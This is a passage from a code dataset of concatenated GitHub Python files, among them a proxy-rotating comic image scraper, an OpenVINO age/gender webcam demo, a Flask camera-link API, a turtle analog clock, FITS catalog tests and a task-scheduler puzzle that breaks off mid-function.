1\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"出现未知异常 [{0:s}]\".format(e))\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"代理[\" + proxy.get('http') + \"]出现异常,切换至[\" + proxy_list[index] +\n \"],当前为\" + (\"目录\" if page == 0 else \"第\" + str(page)) + \"页\")\n proxy = {\n \"http\": proxy_list[index]\n }\n continue\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"数据查询成功,等待睡眠2秒后进行下一页查询\")\n time.sleep(2)\n if this_page_link == prev_page_link and total_page != page:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"漫画[\" + comic_id + \"]写入出现问题,页数不符\")\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"当前漫画所有页读取完成,进行写入\")\n json_list = json.dumps(img_list)\n with open(\"ComicData/\" + comic_id + \".json\", 'w') as f:\n f.write(json_list)\n print(now() + \"漫画[\" + comic_id + \"]写入完成\")\n\n\n# 下载图片\ndef download_img(img_link, comic_id):\n try:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载图片中[\" + img_link + \"]\")\n if not os.path.exists(\"ComicData/\" + comic_id):\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"创建目录[\" + comic_id + \"]\")\n os.mkdir(\"ComicData/\" + comic_id)\n file_name = img_link.split(\"/\")[-1]\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"文件名称为[\" + file_name + \"]\")\n r = requests.get(img_link, timeout=10)\n with open(\"ComicData/\" + comic_id + \"/\" + file_name, \"wb\") as code:\n code.write(r.content)\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"写入完成\")\n return True\n except ReadTimeout as e:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载超时 : [{0:s}]\".format(e))\n return False\n except Exception as e:\n print(now() + \"读取漫画[\" + comic_id + \"]:\" + \"下载出现异常 : [{0:s}]\".format(e))\n return False\n\n\n# 从头开始\ndef start(page=1, max_page=20):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n\n dir_name = init(proxy_list[index], page, max_page)\n print(now() + \"梳理获取的数据\")\n new_list = []\n for i in range(1, max_page - 1):\n with open(dir_name + '/' + str(i) + \".json\", 'r') as f:\n new_list += json.loads(f.read(-1))\n\n with 
open(dir_name + '/total.json', 'w') as f:\n f.write(json.dumps(new_list))\n print(now() + \"梳理完成\")\n\n # 将梳理结果写入数据库\n try:\n read_comic_to_db.driver(dir_name + '/total.json')\n except Exception:\n print(now() + \"写入数据库失败,跳过写入操作\")\n # 梳理完成后开始读取图片\n after(dir_name + '/total.json')\n\n\n# 从头开始\ndef multi_start(page=1, max_page=20):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n\n dir_name = init(proxy_list[index], page, max_page)\n print(now() + \"梳理获取的数据\")\n new_list = []\n for i in range(1, max_page - 1):\n with open(dir_name + '/' + str(i) + \".json\", 'r') as f:\n new_list += json.loads(f.read(-1))\n\n with open(dir_name + '/total.json', 'w') as f:\n f.write(json.dumps(new_list))\n print(now() + \"梳理完成\")\n\n # 将梳理结果写入数据库\n try:\n read_comic_to_db.driver(dir_name + '/total.json')\n except Exception:\n print(now() + \"写入数据库失败,跳过写入操作\")\n # 梳理完成后开始读取图片\n multi_thread_after(dir_name + '/total.json')\n\n\n# 读取每个漫画的图片\ndef after(total_json_file):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n data = ''\n # 将total数据全部读取\n with open(total_json_file, 'r') as f:\n for line in f.readlines():\n data += line.strip()\n data = json.loads(data)\n for comic in data:\n comic_json_after(comic)\n\n\n# 传入一个json对象,进行图片的读取\ndef comic_json_after(comic_json, get_proxy_again=False):\n global proxy_list, headers\n if get_proxy_again:\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n read_comic_img_info(comic_json['comicLink'], headers, proxy_list[index])\n\n\n# 读取每个漫画的图片 多线程版本\ndef multi_thread_after(total_json_file):\n global proxy_list\n init_proxy.create_proxy()\n print(now() + \"获取代理成功\")\n with open('proxy.json', 'r') as f:\n proxy_list = json.loads(f.read(-1))\n data = ''\n # 将total数据全部读取\n with open(total_json_file, 'r') as f:\n for line in f.readlines():\n data += line.strip()\n json_list_data = json.loads(data)\n\n # q是任务队列\n q = Queue()\n # data是comic对象队列\n comic_list = Queue()\n # NUM是并发线程总数\n NUM = 15\n # JOBS是有多少任务,也就是comic_list的大小\n JOBS = 0\n\n # 在工作之前,将json_list_data的数据放入comic_list中\n for comic in json_list_data:\n JOBS += 1\n comic_list.put(comic)\n\n print(now() + \"要执行\" + str(JOBS) + \"个任务\")\n\n # 这个是工作进程,负责不断从队列取数据并处理\n def working():\n while True:\n comic_json = comic_list.get()\n print(now() + \"执行新任务:下载[\" + comic_json['comicId'] + \"]漫画\")\n comic_json_after(comic_json)\n sleep(1)\n q.task_done()\n\n # fork NUM个线程等待队列\n for i in range(NUM):\n print(now() + \"创建线程[\" + str(i) + \"]中\")\n t = Thread(target=working)\n t.setDaemon(True)\n t.start()\n # 把JOBS排入队列\n for i in range(JOBS):\n # print(now() + \"执行第[\" + str(i) + \"]个任务\")\n q.put(i)\n # 等待所有JOBS完成\n q.join()\n\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n","repo_name":"Hope6537/hope-tactical-equipment","sub_path":"hope-python-script/comic_hentai/search_and_download_comic.py","file_name":"search_and_download_comic.py","file_ext":"py","file_size_in_byte":20539,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"34065144999","text":"import cv2, sys\nimport numpy as np\nfrom openvino.inference_engine import IENetwork, IECore\n\nmodel_name = 'age-gender-recognition-retail-0013'\npath = \"./intel/age-gender-recognition-retail-0013/FP16/\"\nclasses = {\n 0: \"Girl\",\n 1: 
\"Boy\"\n}\n\nie = IECore() # Load CPU extenstion\nnet = ie.read_network(model=path+model_name+'.xml', \n weights=path+model_name+'.bin') # Read IR model\n\ninput_blob = next(iter(net.input_info)) # Get input name\n\nout_blob = []\nfor output in iter(net.outputs):\n out_blob.append(output)\n\nbatch, channel, height, width = net.input_info[input_blob].input_data.shape # Get input shape\n\nprint(\"Load IR to device\")\nexec_net = ie.load_network(network=net, device_name='CPU') # Load IR model to device\n\nprint(\"Start\")\ncap = cv2.VideoCapture(0)\nwhile True:\n ret, ori_image = cap.read()\n # cv2.imshow(\"input\", image) # Read image and manipulate\n ori_shape = ori_image.shape # Record original size\n image = cv2.resize(ori_image, (width, height)) # Resize to network image size\n t_image = image.transpose((2, 0, 1)) # Change data layout from HWC to CHW\n\n \"\"\"Infer!!!\"\"\"\n res = exec_net.infer(inputs={input_blob: t_image}) # Inference\n \n for blob in out_blob:\n\n if blob == \"age_conv3\":\n age_info = \"Age: {}\".format(res[blob][0][0][0][0]*100)\n print(age_info)\n else:\n prob = res[blob][0]\n gender_info = \"Gender: {}\".format(classes[np.argmax(prob)])\n print(gender_info)\n \n cv2.putText(ori_image, age_info+\"\\t\"+gender_info, (10, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1, cv2.LINE_AA)\n cv2.imshow(\"results\", ori_image) \n \n if 0xFF & cv2.waitKey(1) == 27:\n break\n\ncv2.destroyAllWindows()\n","repo_name":"p513817/openvino-age-gender-py-sample","sub_path":"legacy/age_gender_recognition.py","file_name":"age_gender_recognition.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21014147500","text":"from flask import Flask, request\nfrom flask_cors import CORS\nfrom pymongo import MongoClient\nimport json\n\nclient = MongoClient('localhost:27017')\ndb = client.cameras\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/add_camera', methods=['POST'])\ndef add_camera():\n if request.method == 'POST':\n data = request.get_json(force=True)\n rtsp = data['rtsp']\n lip = data['lip']\n lport = data['lport']\n tport = data['tport']\n sip = data['sip']\n sport = data['sport']\n\n if sip == \"\" or tport == \"\":\n p = rtsp.replace(\"[ip]\", lip, 1)\n q = p.replace(\"[port]\", lport, 1)\n rtsp = q\n else:\n p = rtsp.replace(\"[ip]\", sip, 1)\n q = p.replace(\"[port]\", tport, 1)\n rtsp = q\n \n db.camera.insert_one(\n {\n \"rtsp\": rtsp,\n \"lip\": lip,\n \"lport\": lport,\n \"tport\": tport,\n \"sip\": sip,\n \"sport\": sport\n }\n )\n\n return \"success\"\n\n@app.route('/show_camera', methods=['GET'])\ndef show_camera():\n l = []\n data = db.camera.find()\n for d in data: \n l.append(d[\"rtsp\"])\n return json.dumps(l)\n\n@app.route('/delete_camera', methods=['POST'])\ndef delete_camera():\n if request.method == 'POST':\n data = request.get_json(force=True)\n rtsp_link = data['rtsp']\n \n db.camera.delete_many({\"rtsp\":rtsp_link})\n\n return \"success\"\n\nif __name__ == '__main__':\n app.run(host=\"10.138.0.32\", debug=True)\n","repo_name":"bipni/tunnel","sub_path":"gcp-instance/addcamera.py","file_name":"addcamera.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73249393194","text":"def polynomial_mul(a, b):\n result = [0 for _ in range(len(a) + len(b) - 1)]\n for i in range(len(a)):\n for j in range(len(b)):\n result[i + j] += a[i] * b[j]\n return [i % MOD for 
i in result]\n\n\ndef get_result(a, q):\n global n, k\n while n >= k:\n for i in range(k, 2 * k):\n a[i] = sum((-q[j] * a[i - j]) % MOD for j in range(1, k + 1)) % MOD\n r = polynomial_mul(q, [(q[i] if i % 2 == 0 else -q[i]) % MOD for i in range(len(q))])\n a = [a[i] % MOD for i in range(len(a)) if i % 2 == n % 2]\n a.extend(0 for _ in range(2 * k - len(a)))\n q = [r[i] for i in range(len(r)) if i % 2 == 0]\n n //= 2\n return a[n]\n\n\nMOD = 104_857_601\nk, n = map(int, input().split())\nn -= 1\na = list(map(int, input().split()))\na.extend(0 for _ in range(2 * k - len(a)))\nc = [1, *map(lambda x: MOD - int(x), input().split())]\nprint(get_result(a, c))\n","repo_name":"priamoryki/ITMO","sub_path":"semester-4/discrete-math/Lab-1/TaskI.py","file_name":"TaskI.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10859045019","text":"#求学生成绩平均数\n#\n# def main():\n# number = int(input('请输入学生人数: '))\n# names = [None] * number\n# scores = [None] * number\n# for index in range(len(names)):\n# names[index] = input('请输入第%d个学生的名字: ' % (index + 1))\n# scores[index] = float(input('请输入第%d个学生的成绩: ' % (index + 1)))\n# total = 0\n# for index in range(len(names)):\n# print('%s: %.1f分' % (names[index], scores[index]))\n# total += scores[index]\n# print('平均成绩是: %.1f分' % (total / number))\n#\n#\n# if __name__ == '__main__':\n# main()\n\ndef main():\n name = []\n sorce = []\n a = 0\n need = 'y'\n while need == 'y':\n a += 1\n # nam = input('请输入第%d个学生姓名' % (a))\n # name.append(nam)\n sorc = input('请输入第%d个学生成绩' % (a))\n sorce.append(sorc)\n # print(sorce)\n need = input('是否继续添加?y/n')\n\n total = 0\n for i in range(0, len(sorce)):\n total += int(sorce[i])\n print(\"平均成绩为: \", total // len(sorce))\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Lonong/Python_first","sub_path":"python/studentsys/sorce_mean.py","file_name":"sorce_mean.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20723428256","text":"import os\nfrom urllib.parse import urlparse\nimport requests\n\n\ndef download_images(all_image_links, safe_folder):\n os.makedirs(safe_folder, exist_ok=True)\n for index, space_image_link in enumerate(all_image_links):\n path = urlparse(space_image_link).path\n extension = os.path.splitext(path)[1]\n image_name = f'space_image_{index}{extension}'\n filename = os.path.join(safe_folder, image_name)\n response = requests.get(space_image_link)\n response.raise_for_status()\n with open(filename, 'wb') as file:\n file.write(response.content)","repo_name":"remboinc/download-photos-from-NASA","sub_path":"download_images.py","file_name":"download_images.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24673817084","text":"#Clock Assignment\nimport turtle\nimport datetime\nscreen=turtle.Screen()\nClock=turtle.Turtle()\n#screen setup\nscreen.bgcolor(\"light green\")\nscreen.title(\"Clock Assignment\")\nscreen.setup(width=1000, height=700)\npen=turtle.Turtle()\npen.speed(0)\npen.penup()\npen.goto(0,0)\n#Draw Layout of Clock\ndef draw_layout_of_clock(clock,x,y,radius, angle,color): #In this function the first arg is a positional argument\n clock.speed(0)\n clock.penup()\n clock.color(color)\n clock.begin_fill() #call the turtle to fill circle before drawn\n clock.goto(x+radius,y) # Move turtle along x axis by 
distance of radius and \n clock.setheading(angle) #set the turtle head to the given angle\n clock.pendown()\n clock.circle(radius)# draw circle\n clock.end_fill() #Fill circle after last call of draw_layout_of_clock to begin fill.\n clock.penup()\n clock.goto(0,0)\n\ndraw_layout_of_clock(Clock,0,0,300,90,\"dimgray\") #Outercircle to decorate outerside of clock \ndraw_layout_of_clock(Clock,0, 0,280,90 ,\"darkgray\")# \ndraw_layout_of_clock(Clock,0,0,8,90,\"black\")#inner most circle\n#Writing clock points on the circle by using hash \nHash=turtle.Turtle() \nHash.hideturtle()\npen.penup()\npen.goto(0,0)\nHash.setheading(90)\nHash.speed(0)\nfor i in range (60):\n if i%5==0:\n Hash.penup()\n Hash.pencolor(\"orange\")\n Hash.pensize(4)\n Hash.forward(260)\n Hash.pendown()\n Hash.forward(19)\n Hash.penup()\n Hash.goto(0,0)\n Hash.right(6)\n else:\n Hash.pensize(2)\n Hash.pencolor(\"black\")\n Hash.speed(0)\n Hash.goto(0,0)\n Hash.forward(274)\n Hash.pendown()\n Hash.forward(5)\n Hash.penup()\n Hash.goto(0,0)\n Hash.right(6) \n\npen.color(\"black\")\npen.penup()\nClock_Number=turtle.Turtle()\nClock_Number.setheading(60)\nClock_Number.speed(0)\ni=1\n#The following while loop writes the number of clock at the directed position 1-12\nwhile i<=12:\n Clock_Number.penup()\n Clock_Number.goto(0,-15)\n Clock_Number.forward(240)\n Clock_Number.pendown()\n Clock_Number.write(i,align=\"center\",font=(\"Stencil\",20,\"normal\"))\n Clock_Number.penup()\n Clock_Number.goto(0,0)\n Clock_Number.right(30)\n i=i+1\n#drawing hour hand shape,size and color\nHour_hand=turtle.Turtle()\nHour_hand.color (\"black\")\nHour_hand.shape(\"arrow\")\nHour_hand.speed(10)\nHour_hand.shapesize(stretch_wid=0.3, stretch_len=15)\n#Drawing minute hand shape,size and color\nMinute_hand=turtle.Turtle()\nMinute_hand.color(\"green\")\nMinute_hand.shape(\"arrow\")\nMinute_hand.speed(10)\nMinute_hand.shapesize(stretch_wid=0.3, stretch_len=20)\n\n#draw second hand shape,size and color\nSecond_Hand=turtle.Turtle()\nSecond_Hand.color(\"red\")\nSecond_Hand.shape(\"arrow\")\nSecond_Hand.speed(10)\nSecond_Hand.shapesize(stretch_wid=0.2, stretch_len=26)\n\n#The following function is to Move Hour hand clockwise by converting current hour and minute to angle in degree\n#because the point where angle is (0) degree time is 3 O'clock \n#multiplied by -30 means to move hour hand clockwise and angle goes from 0 to -360 in 24 hours.\n\ndef Move_Hour_Hand():\n Current_hr=datetime.datetime.now().hour # get Current hour from computer\n Current_Min=datetime.datetime.now().minute \n angle = (Current_hr - 3) * -30 +(-0.5*Current_Min) #move hour hand smoothly that is for every 2 minute move by -1 degree\n Hour_hand.setheading(angle)\nscreen.ontimer(Move_Hour_Hand, 60000)\n\n#The following function is to move Minute hand by converting current minute and second to angle in degree\n#Here at point where turtle angle is 0 degree minute is 15.The measure of angle between min and min is 6 degree \n#when second hand move by angle of -10 degree, minute hand move by -1 degree\ndef Move_Minute_Hand():\n Current_Min=datetime.datetime.now().minute\n Current_Sec=datetime.datetime.now().second\n angle= ((Current_Min - 15) *-6)+(-Current_Sec * 0.1) \n Minute_hand.setheading(angle)\n screen.ontimer(Move_Minute_Hand,1000) # Here ontimer checks the function called move_minute_hand after 1 sec\n#moving second hand\ndef Move_Second_Hand():\n Current_Sec=datetime.datetime.now().second\n angle= (Current_Sec - 15) * -6\n Second_Hand.setheading(angle)\n 
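# (Current_Sec - 15) * -6 converts seconds to a turtle heading: heading 0 points at\n # 3 o'clock (15 s), and -6 degrees per elapsed second sweeps the hand clockwise\n 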
screen.ontimer(Move_Second_Hand,1) #Here ontimer checks the move_second_hand function after 1 milisecond to make second precise.\n#The following ontimer is an infinite loop.\nscreen.ontimer(Move_Hour_Hand, 1)\nscreen.ontimer(Move_Minute_Hand, 1)\nscreen.ontimer(Move_Second_Hand, 1)\nturtle.hideturtle()\nscreen.mainloop()\n\n","repo_name":"Usmaelabdureman/Analog-clock","sub_path":"analog-clock.py","file_name":"analog-clock.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29172726322","text":"'''\nCalculate how many more points the first person, a, should win in order to satisfy the condition that they have a score higher or equal to 11 \nand higher than the second person, b, by at least 2 points. \n(find the min. If they always same scors, then infinity)\n'''\n\ndef points_to_win(a, b):\n if a >= 11 and a >= b + 2:\n return 0 \n elif a < 11 and b < 11:\n return 11 - a # First person needs to reach 11 points first.\n else:\n return max(11 - a, 2 - (a - b))\n\n# test\n# a_score = 8\n# b_score = 6\n# a_score = 30\n# b_score = 31\n# a_score = 8\n# b_score = 8\na_score = 18\nb_score = 18\nadditional_points = points_to_win(a_score, b_score)\nprint(f\"Person a should win {additional_points} more points.\")\n\n\n","repo_name":"ChopinNo3Op9/funny_coding","sub_path":"extra scores to win.py","file_name":"extra scores to win.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36066644880","text":"\"\"\"show language field\n\nRevision ID: 22f62dd63bd4\nRevises: 1852cafc4891\nCreate Date: 2019-08-25 14:39:43.373197\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '22f62dd63bd4'\ndown_revision = '1852cafc4891'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.add_column('shows',\n sa.Column(\n 'language', \n sa.String(100),\n )\n )\n\n\ndef downgrade():\n raise NotImplemented()\n","repo_name":"thomaserlang/seplis","sub_path":"seplis/api/migration/versions/22f62dd63bd4_show_language_field.py","file_name":"22f62dd63bd4_show_language_field.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39069301065","text":"\nfrom collections import OrderedDict\nfrom train import train\nimport numpy as np\nimport torch.nn as nn\nfrom models.style_verbose import G_mapping,G_synthesis\nfrom models.styleGan import Discriminator,StyleBased_Generator\nfrom dataset import return_cifar10\nimport os\n\ndef check_paths():\n base_dir = os.getcwd()\n paths = ['generated_images','model_weights']\n for path in paths:\n dir_path = os.path.join(base_dir,path)\n if not os.path.isdir(path): \n os.mkdir(dir_path) \n\ndef main():\n check_paths()\n # Load data\n cifar10_path = '/home/shuza/Documents/Data/cifar-10-batches-py'\n train_data,test_data = return_cifar10(cifar10_path)\n train_x,train_labels = train_data\n test_x,test_labels = test_data\n\n params = {\n 'base_dir': os.getcwd(),\n 'image_dir' : os.path.join(os.getcwd(),'generated_images'),\n 'weight_dir' : os.path.join(os.getcwd(),'model_weights'),\n 'iterations':1000,\n 'batch_size':1,\n 'latent_dim':512,\n 'alpha': 0,\n 'resolution':32,\n 'step' : 3\n }\n datasets = {\n 'x_train':train_x.transpose(0,3,2,1),\n 'x_test':test_x.transpose(0,3,2,1),\n 'train_labels':train_labels,\n 'test_labels':test_labels\n }\n # generator = 
nn.Sequential(OrderedDict([\n # ('g_mapping', G_mapping()),\n # #('truncation', Truncation(avg_latent)),\n # ('g_synthesis', G_synthesis()) \n # ]))\n # Model params\n n_fc = 8\n dim_latent = 512\n dim_input = 4\n\n generator = StyleBased_Generator(n_fc,dim_latent,dim_input)\n discriminator = Discriminator()\n train(params,datasets,generator,discriminator)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Morgan-Griffiths/GAN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72825716393","text":"import csv\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas\nimport pytest\nfrom astropy import units as u\nfrom astropy import wcs\nfrom astropy.coordinates import ICRS\nfrom astropy.io import fits\nfrom astropy.io.fits import Header\nfrom astropy_healpix import HEALPix\nfrom logzero import logger\nfrom . import sample_headers\n\nfrom src.fitstools.catalog import Catalogs\nfrom src.fitstools.util import read_headers\n\nour_path = os.path.dirname(__file__)\ndeep_sky_file = os.path.join(our_path, \"../fitstools/data/deep_sky.csv\")\nhyperleda_file = os.path.join(our_path, \"../fitstools/data/hyperleda.csv\")\ntest_file = os.path.join(Path(__file__).parent, \"test-data\\\\M57_2020-05-30T022249_30sec_HaOIII_COLD_-17C_frame19.fit\")\n\ndef test_csv_reader():\n logger.info(\"start\")\n count = 0\n catalog = []\n with open(hyperleda_file, newline='', encoding=\"utf-8\") as fh:\n fh.readline() # skip first line\n fh.readline() # skip 2nd line\n reader = csv.reader(fh)\n for line in reader:\n if len(line) < 3:\n continue\n ra_deg = (int(line[0]) / float(864000 / 360)) # * u.deg\n dec_deg = (int(line[1]) / float(324000 / 90)) # * u.deg\n # catalog.append([ra_deg, dec_deg])\n count += 1\n\n logger.info(\"stop - \" + str(count))\n\n\ndef test_pandas_reader():\n header = read_headers(test_file)\n w = wcs.WCS(header).celestial\n hp = HEALPix(nside=16, frame='icrs')\n\n logger.info(\"start\")\n df = pandas.read_csv(hyperleda_file, skiprows=1, engine='c', usecols=[0, 1, 2], header=0,\n names=['ra', 'dec', 'name'], dtype={'ra': int, 'dec': int, 'name': object})\n df['ra'] = df['ra'] / float(864000 / 360)\n df['dec'] = df['dec'] / float(324000 / 90)\n ra = df.ra.to_numpy() * u.deg\n dec = df.dec.to_numpy() * u.deg\n df['hp'] = hp.lonlat_to_healpix(ra, dec)\n\n logger.info(\"stop - \" + str(len(df)))\n cat = df.groupby('hp')\n logger.info(\"groupby - \" + str(len(df)))\n\n@pytest.fixture()\ndef catalog():\n catalog = Catalogs()\n return catalog\n\n\ndef test_find_objects(catalog):\n header = Header.fromstring(sample_headers.header_sgp_fixed_wcs, \"\\n\")\n objects = catalog.find_objects(header)\n logger.info(objects)\n names = map(lambda t: t[2], objects)\n assert \"M57/NGC6720/Ring_Nebula\" in names\n assert \"IC1296\" in names\n\n\ndef test_wcs_astap():\n with fits.open(test_file, mode='readonly') as hdul:\n validation = wcs.validate(hdul)\n print(validation)\n print(\"------------------------------------------\")\n\n header = read_headers(test_file)\n w = wcs.WCS(header).celestial\n print(w.wcs.name)\n w.wcs.print_contents()\n print(\"------------------------------------------\")\n\n w.printwcs()\n print(\"------------------------------------------\")\n\n fp = w.calc_footprint()\n for point in fp:\n c = ICRS(point[0] * u.degree, point[1] * u.degree)\n rahmsstr = c.ra.to_string(u.hour)\n decdmsstr = c.dec.to_string(u.degree, 
alwayssign=True)\n print(rahmsstr + ' ' + decdmsstr)\n\n\ndef test_wcs_sgp():\n with fits.open(test_file, mode='readonly') as hdul:\n validation = wcs.validate(hdul)\n print(validation)\n print(\"------------------------------------------\")\n\n header = read_headers(test_file)\n w = wcs.WCS(header).celestial\n print(w.wcs.name)\n w.wcs.print_contents()\n print(\"------------------------------------------\")\n\n w.printwcs()\n print(\"------------------------------------------\")\n\n fp = w.calc_footprint()\n for point in fp:\n c = ICRS(point[0] * u.degree, point[1] * u.degree)\n rahmsstr = c.ra.to_string(u.hour)\n decdmsstr = c.dec.to_string(u.degree, alwayssign=True)\n print(rahmsstr + ' ' + decdmsstr)\n","repo_name":"bcolyn/fitstools","sub_path":"src/tests/test_catalog.py","file_name":"test_catalog.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33867249762","text":"import logging\nimport time\nimport pyautogui\nfrom copy import copy\n\n\ndef go_back():\n pyautogui.hotkey('ctrl', 'backspace')\n\n\ndef scroll(self, amount=1):\n for i in range(amount):\n move_mouse(self, self.width // 2, int(self.height * self.scroll_up_mouse_pos))\n pyautogui.dragTo(0, int(self.height * self.scroll_down_mouse_pos), self.scroll_time)\n move_mouse(self, self.width // 2, int(self.height * self.scroll_up_mouse_pos))\n pyautogui.dragTo(0, int(self.height * self.scroll_down_mouse_pos), self.scroll_time)\n time.sleep(self.scroll_time)\n\n\ndef move_mouse(self, rel_x1, rel_y1, rel_x2=None, rel_y2=None, start_x=None, start_y=None, sleep_time=None,\n click=False, sleep=False):\n if start_x is None:\n start_x = copy(self.start_x)\n if start_y is None:\n start_y = copy(self.start_y)\n if sleep_time is None:\n sleep_time = copy(self.loading_time)\n if rel_x2 is None and rel_y2 is None:\n pyautogui.moveTo(start_x + rel_x1, start_y + rel_y1)\n elif rel_x2 is None:\n pyautogui.moveTo(start_x + rel_x1, start_y + rel_y1 + (rel_y2 - rel_y1) // 2)\n elif rel_y2 is None:\n pyautogui.moveTo(start_x + rel_x1 + (rel_x2 - rel_x1) // 2, start_y + rel_y1)\n else:\n pyautogui.moveTo(start_x + rel_x1 + (rel_x2 - rel_x1) // 2, start_y + rel_y1 + (rel_y2 - rel_y1) // 2)\n if click:\n pyautogui.click()\n if sleep:\n time.sleep(sleep_time)\n","repo_name":"TrueBalkar/TrusteePlusAnalyzer","sub_path":"scanner/navigation/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70654824873","text":"from django.shortcuts import render\n\nimport requests\nfrom datetime import datetime\n\n# Create your views here.\n\ndef index(request):\n url = 'https://apiv3.apifootball.com/?action=get_events&from=2023-02-01&to=2023-02-07&league_id=164&APIkey=ba3ed274d9d1bc601524bf1422864036f2bfcacd977264d887fa1954bd9772e9'\n r = requests.get(url)\n jsonResp = r.json()\n# print(jsonResp)\n\n return render(request, 'soccerapp/index.html', {'jr': jsonResp})\n\ndef today(request):\n today = datetime.today().strftime('%Y-%m-%d')\n url = f'https://apiv3.apifootball.com/?action=get_events&from={today}&to={today}&league_id=164&APIkey=ba3ed274d9d1bc601524bf1422864036f2bfcacd977264d887fa1954bd9772e9'\n print(url)\n r = requests.get(url)\n jsonResp = r.json()\n\n return render(request, 'soccerapp/index.html', {'jr': 
jsonResp})","repo_name":"yernarsha/django_soccer_results","sub_path":"soccerapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24216218495","text":"\"\"\"\nPart 1\n------\nWe assume the data is a directed acyclic graph (DAG) of tasks.\n\nRepresented by a set of nodes, and a dictionary mapping Target nodes to a list\nof their pre-requisites.\n\nWe need to build a basic task scheduler:\n Starting with leaf nodes (initial available nodes)\n Loop until no available nodes:\n Given all available nodes, schedule first (in alphabetical order)\n Update list of available nodes\n Create a new tree: where scheduled node is removed from all\n dependency lists\n\nScratch that, new idea\n----------------------\n\nBuild a list of Node objects\n Nodes know their pre-requisite nodes (prev)\n and which nodes they are pre-requisites of (next)\nIdentify leaf nodes as those nodes with no prev\nSet leaf nodes to available\nLoop:\n Given available nodes, schedule / resolve first\n For each of the scheduled_node's next_nodes\n Remove scheduled_node from their prev\n Update list of available - all nodes with no prev\n\nPart 2\n------\nA worker is an object that either points to a Node or points to nothing (idle)\nand chips away at the Node's cost at each timestep in a loop\n\nMain Loop:\n For each idle worker:\n assign to any available\n\n complete 1 second of work\n\n if no seconds of work left, make idle\n\"\"\"\nimport re\nfrom copy import deepcopy\nfrom string import ascii_uppercase\nfrom typing import Dict, List, Set\n\n\nLETTER_COST = {letter: (i + 1) for i, letter in enumerate(ascii_uppercase)}\n\n\nclass Node:\n def __init__(self,\n name: str,\n prev: Set[str] = None,\n next: Set[str] = None):\n self.name = name\n self.cost = LETTER_COST[name]\n self.prev = prev if prev is not None else set()\n self.next = next if next is not None else set()\n\n def __repr__(self):\n return f'Node({self.name},' \\\n f'cost={self.cost},' \\\n f'prev={self.prev},' \\\n f'next={self.next})'\n\n def update(self):\n self.cost -= 1\n if self.cost < 0:\n raise RuntimeError('cost must not be less than zero')\n\n\ndef parse_nodes(lines: List[str]) -> Dict[str, Node]:\n pattern = re.compile(\n r'^Step ([A-Z]) must be finished before step ([A-Z]) can begin.$')\n nodes: Dict[str, Node] = {}\n for line in lines:\n req, target = re.match(pattern, line.strip()).groups()\n\n if req not in nodes:\n nodes[req] = Node(req)\n nodes[req].next.add(target)\n\n if target not in nodes:\n nodes[target] = Node(target)\n nodes[target].prev.add(req)\n\n return nodes\n\n\ndef leaf_nodes(nodes: Dict[str, Node]) -> List[str]:\n return [name for name, node in nodes.items() if not node.prev]\n\n\ndef schedule_nodes(nodes: Dict[str, Node]) -> List[str]:\n nodes = deepcopy(nodes)\n schedule = []\n available = 